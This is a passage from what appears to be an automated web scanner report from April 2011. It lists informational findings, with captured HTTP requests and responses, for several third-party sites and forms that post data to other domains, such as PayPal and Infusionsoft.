twitterCallback2([{"text":"The New Ways Thieves Are Stealing Your Identity: http:\/\/t.co\/2CGbAGa via @forbes. All the more reason to make sure you are protected!","geo":null,"in_reply_to_status_id":null,"truncated":false,"created_at":"Tue Apr 19 21:09:36 +0000 2011","retweet_count":0,"in_reply_to_user_id":null,"id_str":"60449995551293440","place":null,"favorited":false,"source":"\u003Ca href=\"http:\/\/twitter.com\/tweetbutton\" rel=\"nofollow\"\u003ETweet Button\u003C\/a\u003E","in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"contributors":null,"retweeted":false,"in_reply_to_user_id_str":null,"user":{"contributors_enabled":false,"profile_background_color":"9AE4E8","profile_background_image_url":"http:\/\/a2.twimg.com\/profile_background_images\/4771620\/pg-twitter-bg.gif","created_at":"Mon Feb 23 21:44:24 +0000 2009","description":"A comprehensive credit reporting, monitoring and identity theft protection service helping you maintain control over your most critical information","follow_request_sent":null,"lang":"en","notifications":null,"favourites_count":0,"id_str":"21697583","profile_text_color":"333333","profile_sidebar_fill_color":"DDFFCC","profile_image_url":"http:\/\/a3.twimg.com\/profile_images\/82248558\/twitter-icon_normal.PNG","is_translator":false,"show_all_inline_media":false,"geo_enabled":false,"profile_background_tile":false,"listed_count":10,"url":"http:\/\/www.privacyguard.com","screen_name":"PrivacyGuard","default_profile":false,"following":null,"time_zone":"Eastern Time (US & Canada)","friends_count":129,"profile_link_color":"008
...[SNIP]...

21.10. http://www.dictof.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dictof.com
Path:   /

Request 1

GET / HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=9ED7BF71162535497E7BF851F34974FF.w1; Path=/
Set-Cookie: lc=en; Path=/
Set-Cookie: CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_DATE_COOKIE=1303648808195; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_URI_COOKIE=%2F; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Content-Language: en
Content-Length: 34995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating with www.dictof.com - Front page</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <link rel="shortcut icon" href="/favicon.ico"/> <meta name="keywords" content="personals, dating, online dating, dating online, online dates, meet people, friend finder, dating buddies, singles online, singles social network" />
<meta name="description" content="www.dictof.com online dating - your ultimate source for finding online dates and singles looking for online personals" />
<meta name="google-site-verification" content="76UgEPD8yHldpzTKJTo3mKEmbvWrb2H1GEvtGvpfaUE" /> <meta http-equiv="X-UA-Compatible" content="chrome=1"> <!--[if lte IE 7]> <link href="/theme/system.ie.css" rel="stylesheet" type="text/css"/> <![endif]--> <link href="/theme/index.common.css" rel="stylesheet" type="text/css"/> <link href="/theme/index.css" rel="stylesheet" type="text/css"/> <!--[if lte IE 7]> <link href="/theme/index.ie.css" rel="stylesheet" type="text/css"/> <![endif]--> <!-- Compacted and minified js --> <script language="JavaScript" type="text/javascript" src="/scripts/df.js?"></script> <script language="JavaScript" type="text/javascript" src="/theme/theme.js"></script> <script language="JavaScript" type="text/javascript" src="/scripts/components/Index.js"></script>

</head>

<body>

<div class="holder" id="
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:12 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=A2B392D1CFDADD58A8D17DD65233A9BF.w1; Path=/
Set-Cookie: lc=en; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_DATE_COOKIE=1303648812315; Expires=Fri, 12-May-2079 15:54:19 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_URI_COOKIE=%2F; Expires=Fri, 12-May-2079 15:54:19 GMT; Path=/
Content-Language: en
Content-Length: 34995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating with www.dictof.com - Front page</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <link rel="shortcut icon" href="/favicon.ico"/> <meta name="keywords" content="personals, dating, online dating, dating online, online dates, meet people, friend finder, dating buddies, singles online, singles social network" />
<meta name="description" content="www.dictof.com online dating - your ultimate source for finding online dates and singles looking for online personals" />
<meta name="google-site-verification" content="76UgEPD8yHldpzTKJTo3mKEmbvWrb2H1GEvtGvpfaUE" /> <meta http-equiv="X-UA-Compatible" content="chrome=1"> <!--[if lte IE 7]> <link href="/theme/system.ie.css" rel="stylesheet" type="text/css"/> <![endif]--> <link href="/theme/index.common.css" rel="stylesheet" type="text/css"/> <link href="/theme/index.css" rel="stylesheet" type="text/css"/> <!--[if lte IE 7]> <link href="/theme/index.ie.css" rel="stylesheet" type="text/css"/> <![endif]--> <!-- Compacted and minified js --> <script language="JavaScript" type="text/javascript" src="/scripts/df.js?"></script> <script language="JavaScript" type="text/javascript" src="/theme/theme.js"></script> <script language="JavaScript" type="text/javascript" src="/scripts/components/Index.js"></script>

</head>

<body>

<div class="holder" id="header">
   <div class="content">
<div class="cover">
       <div class="Header"> <h2><a href="/start/"><img src="/images/logo.png" alt="dictof.com"/
...[SNIP]...

21.11. http://www.flexibilitytheme.com/images/link.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flexibilitytheme.com
Path:   /images/link.gif

Request 1

GET /images/link.gif HTTP/1.1
Host: www.flexibilitytheme.com
Proxy-Connection: keep-alive
Referer: http://www.reputationengineer.com/internet-reputation-management/?gclid=CN-bzOa1tqgCFYbb4AodHHmKBw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 00:41:04 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 186

<html><head><title>403 Permission Denied</title></head>
<body bgcolor=white>
<h1>403 Permission Denied</h1>

You do not have permission for this request /images/link.gif

</body></html>

Request 2

GET /images/link.gif HTTP/1.1
Host: www.flexibilitytheme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:41:13 GMT
Server: Apache
Last-Modified: Wed, 07 Apr 2010 02:00:07 GMT
ETag: "1ea8167-31-4839bebdad7c0"
Accept-Ranges: bytes
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

21.12. http://www.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /default.aspx

Request 1

GET /default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet HTTP/1.1
Host: www.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=h05vhh55un4r0t3lzxjaq3m2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc471557=US; domain=securepaynet.net; path=/
Set-Cookie: flag471557=cflag=us; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currency471557=potableSourceStr=USD; domain=securepaynet.net; expires=Mon, 23-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currencypopin471557=cdisplaypopin=false; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: SplitValue471557=16; domain=securepaynet.net; expires=Mon, 25-Apr-2011 12:42:00 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=16; domain=securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:42:01 GMT
Content-Length: 156097


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<img src="http://img.securepaynet.net/image.aspx?sitename=www.securepaynet.net&server=M1PWCORPWEB197&privatelabelid=471557&isc=kro_2011&status=200&rand=0.154498581846477&page=%2fdefault.aspx&referrer=http%3a%2f%2fkroogy.com%2fpub%2fbanner_728_90_random.php&ci=1767&split=16&querystring=isc%3dkro_2011%26ci%3d1767%26prog_id%3dindextonet&prog_id=indextonet" alt="" class="traffic" />

   
   
   

   
   
    <div align="center" style="width:100%;clear:both;">
        <table width="1000" cellpadding="0" cellspacing="0" border="0">
            <tr>
                <td>
                    <div>
                   

                    </div>
                    <div id="headerHtml">
                       
<!--HEADERBEGIN-->
<!--*-ok-*--><style type="text/css" xmlns:DataCache="urn:xsltDataCache">
   .pch_divnav {border: solid #339933 1px;
       border-bottom: solid #339933 4px;
       background-color: #fff;
       min-width:162px; _width:162px;
       text-align:left; z-index: 200; position: absolute; top: 29px; left: 0px;
       visibility: hidden;}
   .pch_bkg_mbc {background-color: #339933;}
   .pch_cref, a.pch_cref, a.pch_cref:link, a.pch_cref:visited, a.pch_cref:hover {color:#ffffff;}
   .pch_vr {padding: 0; width: 1px; height: 30px; background-color: #ffffff;}    
   .pch_bkg_arw {background-color: #ffffff; font-size: 1px; line-height:1px;}
   .pch_ndiv{padding: 0 6px 0 8px; color: #000; white-space: nowrap; line-height: 20px;}
    a.pch_nref, a.pch_nref:link, a.pch_nref:visited{text-decoration: none; color: #000;}
    a.pch_nref:hover{text-decoration: underline; cursor: pointer; color: #000;}
    a.pch_nref:active{text-decoration: underline; color: #000;}
</style>
<style media="only screen and (max-device-width: 1024px) " xmlns:DataCache="urn:xsltDataCache">
.inp_iphone {-webkit-appearance: none;}
.pch_ipad_ov_bgo { width: 37px; }
.pch_i_ss {border: 0; width: 102px; background-color: #fff;}
.pch_i_lp {border: 0; width: 95px; background-color: #fff;font-size: 11px;}
#pch_pwz {z-index: 160; position: relative; width: 180px; height: 24px; visibility: visible;}
#pch_pwx {z-index: 115; position: relative; width: 3px; height: 24px; visibility: visible;}
#pch td.ov1p {background-color: #fff; width: 115px; w
...[SNIP]...

Request 2

GET /default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet HTTP/1.1
Host: www.securepaynet.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vxs0fkyd1yxdt5nunicacsip; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc471557=US; domain=securepaynet.net; path=/
Set-Cookie: flag471557=cflag=us; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:43:39 GMT; path=/
Set-Cookie: currency471557=potableSourceStr=USD; domain=securepaynet.net; expires=Mon, 23-Apr-2012 12:43:39 GMT; path=/
Set-Cookie: currencypopin471557=cdisplaypopin=false; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:43:39 GMT; path=/
Set-Cookie: SplitValue471557=96; domain=securepaynet.net; expires=Mon, 25-Apr-2011 12:43:39 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=96; domain=securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:43:39 GMT
Content-Length: 156030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<img src="http://img.securepaynet.net/image.aspx?sitename=www.securepaynet.net&server=M1PWCORPWEB197&privatelabelid=471557&isc=kro_2011&status=200&rand=0.96492718437916&page=%2fdefault.aspx&ci=1767&split=96&querystring=isc%3dkro_2011%26ci%3d1767%26prog_id%3dindextonet&prog_id=indextonet" alt="" class="traffic" />

   
   
   

   
   
    <div align="center" style="width:100%;clear:both;">
        <table width="1000" cellpadding="0" cellspacing="0" border="0">
            <tr>
                <td>
                    <div>
                   

                    </div>
                    <div id="headerHtml">
                       
<!--HEADERBEGIN-->
<!--*-ok-*--><style type="text/css" xmlns:DataCache="urn:xsltDataCache">
   .pch_divnav {border: solid #339933 1px;
       border-bottom: solid #339933 4px;
       background-color: #fff;
       min-width:162px; _width:162px;
       text-align:left; z-index: 200; position: absolute; top: 29px; left: 0px;
       visibility: hidden;}
   .pch_bkg_mbc {background-color: #339933;}
   .pch_cref, a.pch_cref, a.pch_cref:link, a.pch_cref:visited, a.pch_cref:hover {color:#ffffff;}
   .pch_vr {padding: 0; width: 1px; height: 30px; background-color: #ffffff;}    
   .pch_bkg_arw {background-color: #ffffff; font-size: 1px; line-height:1px;}
   .pch_ndiv{padding: 0 6px 0 8px; color: #000; white-space: nowrap; line-height: 20px;}
    a.pch_nref, a.pch_nref:link, a.pch_nref:visited{text-decoration: none; color: #000;}
    a.pch_nref:hover{text-decoration: underline; cursor: pointer; color: #000;}
    a.pch_nref:active{text-decoration: underline; color: #000;}
</style>
<style media="only screen and (max-device-width: 1024px) " xmlns:DataCache="urn:xsltDataCache">
.inp_iphone {-webkit-appearance: none;}
.pch_ipad_ov_bgo { width: 37px; }
.pch_i_ss {border: 0; width: 102px; background-color: #fff;}
.pch_i_lp {border: 0; width: 95px; background-color: #fff;font-size: 11px;}
#pch_pwz {z-index: 160; position: relative; width: 180px; height: 24px; visibility: visible;}
#pch_pwx {z-index: 115; position: relative; width: 3px; height: 24px; visibility: visible;}
#pch td.ov1p {background-color: #fff; width: 115px; white-space: nowrap; padding: 1px 0 1px 4px; cursor:pointer;}
.p
...[SNIP]...

21.13. http://www.youtube.com/embed/7SyQh_Wx72M  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /embed/7SyQh_Wx72M

Request 1

GET /embed/7SyQh_Wx72M HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/about
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=s1z-YuDnG-Y; PREF=fv=10.2.154

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:16 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 9517
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - What&#39;s it Like to Work at Infusionsoft?</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflpBoefE.css">


</
...[SNIP]...
h_Wx72M", "length_seconds": 312, "allow_embed": 1, "enablejsapi": "0", "sk": "-bLTxB7LJ2kSB1Yi71TKR3A8grBAEf3ZC", "allow_ratings": 1, "hl": "en_US", "jsapicallback": "yt.embed.onPlayerReady", "eurl": "http:\/\/www.infusionsoft.com\/about", "use_native_controls": false}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vfl2zZku3.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vfl2zZku3.swf"},
'ORIGIN': "*",
'IS_OPERA_MOBILE': false,
'IS_HTML5_MOBILE_DEVICE': false
});
yt.setMsg({
'FLASH_UPGRADE': '<div class=\"yt-alert yt-alert-error yt-alert-player yt-rounded \"><img src=\"\/\/s.ytimg.com\/yt\/img\/pixel-vfl3z5WfW.gif\" class=\"icon master-sprite\" alt=\"Alert icon\"><div class=\"yt-alert-content\"> You need to upgrade your Adobe Flash Player to watch this video. <br> <a href=\"http:\/\/get.adobe.com\/flashplayer\/\">Download it from Adobe.<\/a>\n<\/div><\/div>'
});

yt.embed.writeEmbed();
</script>



</body>
</html>

Request 2

GET /embed/7SyQh_Wx72M HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=s1z-YuDnG-Y; PREF=fv=10.2.154

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:16 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 9481
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - What&#39;s it Like to Work at Infusionsoft?</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflpBoefE.css">


</
...[SNIP]...
h_Wx72M", "length_seconds": 312, "allow_embed": 1, "enablejsapi": "0", "sk": "-bLTxB7LJ2kSB1Yi71TKR3A8grBAEf3ZC", "allow_ratings": 1, "hl": "en_US", "jsapicallback": "yt.embed.onPlayerReady", "eurl": "", "use_native_controls": false}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vfl2zZku3.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vfl2zZku3.swf"},
'ORIGIN': "*",
'IS_OPERA_MOBILE': false,
'IS_HTML5_MOBILE_DEVICE': false
});
yt.setMsg({
'FLASH_UPGRADE': '<div class=\"yt-alert yt-alert-error yt-alert-player yt-rounded \"><img src=\"\/\/s.ytimg.com\/yt\/img\/pixel-vfl3z5WfW.gif\" class=\"icon master-sprite\" alt=\"Alert icon\"><div class=\"yt-alert-content\"> You need to upgrade your Adobe Flash Player to watch this video. <br> <a href=\"http:\/\/get.adobe.com\/flashplayer\/\">Download it from Adobe.<\/a>\n<\/div><\/div>'
});

yt.embed.writeEmbed();
</script>



</body>
</html>

22. Cross-domain POST  previous  next
There are 6 instances of this issue:


22.1. http://controlcase.com/ASV_register.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://controlcase.com
Path:   /ASV_register.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /ASV_register.php HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:25:41 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div class="indentblock">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

22.2. http://www.infusionblog.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain crm.infusionsoft.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:37:12 GMT
Expires: Mon, 25 Apr 2011 01:42:22 GMT
Pragma: public
Connection: Keep-Alive
Set-Cookie: X-Mapping-glbfbjch=6C1FE170452DF50DF4E2477FF60172A1; path=/
Last-Modified: Mon, 25 Apr 2011 00:42:22 GMT
Content-Length: 38973

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<br /><form action="https://crm.infusionsoft.com/AddForms/processFormSecure.jsp" method='post'> <input type="hidden" name="infusion_xid" id="infusion_xid" value="6c6603a597f2220eb16b3c8dba5e7a8c" />
...[SNIP]...

22.3. http://www.infusionblog.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain crm.infusionsoft.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:37:12 GMT
Expires: Mon, 25 Apr 2011 01:42:22 GMT
Pragma: public
Connection: Keep-Alive
Set-Cookie: X-Mapping-glbfbjch=6C1FE170452DF50DF4E2477FF60172A1; path=/
Last-Modified: Mon, 25 Apr 2011 00:42:22 GMT
Content-Length: 38973

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
</script><form name="subscribeForm" action="https://crm.infusionsoft.com/AddForms/processForm.jsp" target="popupwindow" method="post"><input value="478" type="hidden" id="formid" name="formid" />
...[SNIP]...

22.4. http://www.nextadvisor.com/credit_report_monitoring/free_credit_score_review.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/free_credit_score_review.php

Issue detail

The page contains a form which POSTs data to the domain www.emailmeform.com. The form contains the following fields:

Request

GET /credit_report_monitoring/free_credit_score_review.php HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=42bb280306117df0c9cb96a64969e55a; __utmz=252293142.1303674300.2.2.utmgclid=CPK-2pL1tagCFUxo5QodMipJDQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303674300.2; __utmc=252293142

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:44:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 24403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
</a>.

